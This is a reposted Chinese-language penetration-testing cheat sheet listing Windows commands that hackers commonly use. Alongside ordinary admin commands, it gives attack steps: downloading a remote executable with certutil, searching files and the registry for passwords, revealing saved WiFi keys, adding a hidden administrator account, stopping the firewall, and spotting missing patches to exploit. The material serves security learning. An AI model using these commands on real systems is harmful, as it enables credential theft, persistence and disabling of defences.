安基网 首页 安全 渗透测试 查看内容

「渗透基础」-黑客常用Windows命令笔记

2019-12-29 11:10| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头!渗透命令:certutil-----从远程url下载文件案例:certutil -urlcache -split -f http://baidu.com/test.exefindstr-----查找文件后缀结果findstr /s /i "pass" *.py*reg query HKLM /f password /t REG_SZ /s-----搜集注 ...


如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头!


渗透命令:

certutil-----从远程url下载文件

案例:certutil -urlcache -split -f http://baidu.com/test.exe


findstr-----查找文件后缀结果

findstr /s /i "pass" *.py*

reg query HKLM /f password /t REG_SZ /s-----搜集注册表中的各种密码数据


查看有没有开启远程链接,运行下面命令:

REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

结果:1表示关闭,0表示开启


快速查找未打补丁的exp

systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt


常用命令:

ipconfig/all-----网络配置情况

ipconfig /displaydns-----查看本地DNS缓存

netsh wlan show profile-----查看连接过的 wifi 名

netsh wlan show profile WiFi-name key=clear 获取 wifi 对应的的密码

query user-----查当前机器中正在线的用户,看管理员在不在

net view------显示域列表/计算机列表

net user------查看当前所有账号,判断域规模

net group-----查看当前域所有的组名

net user bzhack pass /add-----增加用户

net user bzhack /del-----删除用户

net Localgroup-----添加、显示本地组

net localgroup administrators bzhack /add-----将bzhack加入管理员组

net share----- 查看当前机器开启的共享


文件操作:

md-----建文件夹

rd-----删除文件夹

tree-----显示文件夹结构

dir-----显示磁盘目录内容

copy-----复制文件

Xcopy-----copy加强版,复制文件夹

del-----删除文件

ren-----[原文件/夹名][新文件/夹名]修改文件名

type-----查看文本内容

dir /a /s /b d:"*.conf"-----搜索d盘里conf结尾的文件

edit-----文本编辑

type-----显示文件内容


网络命令:

netstat -a----- 列出所有端口

netstat -p----- 显示 PID 和进程名称

netstat -r----- 显示核心路由信息

netstat -at-----列出所有tcp连接

netstat -au-----列出所有ucp连接

netstat -an |find "3389" 查看开启3389端口的信息

netstat -ano | findstr "ESTABLISHED" 查看当前正处于连接状态的端口及ip

netstat -ano | findstr "LISTENING" 查看当前正处于监听状态的端口及ip

其他命令

ver-----查看版本

hostname-----查看机器名

whoami-----查看权限

systeminfo-----查看配置

tasklist-----查看进程

cls-----清屏

net start-----查看开启的服务,比如Terminal Services 远程连接服务

net stop sharedaccess-----关闭防火墙

set-----查看当前机器的环境变量,看有没有我们可以直接利用到的语言环境

fsutil fsinfo drives-----列出当前机器上的所有盘符



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6775448574621647363/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部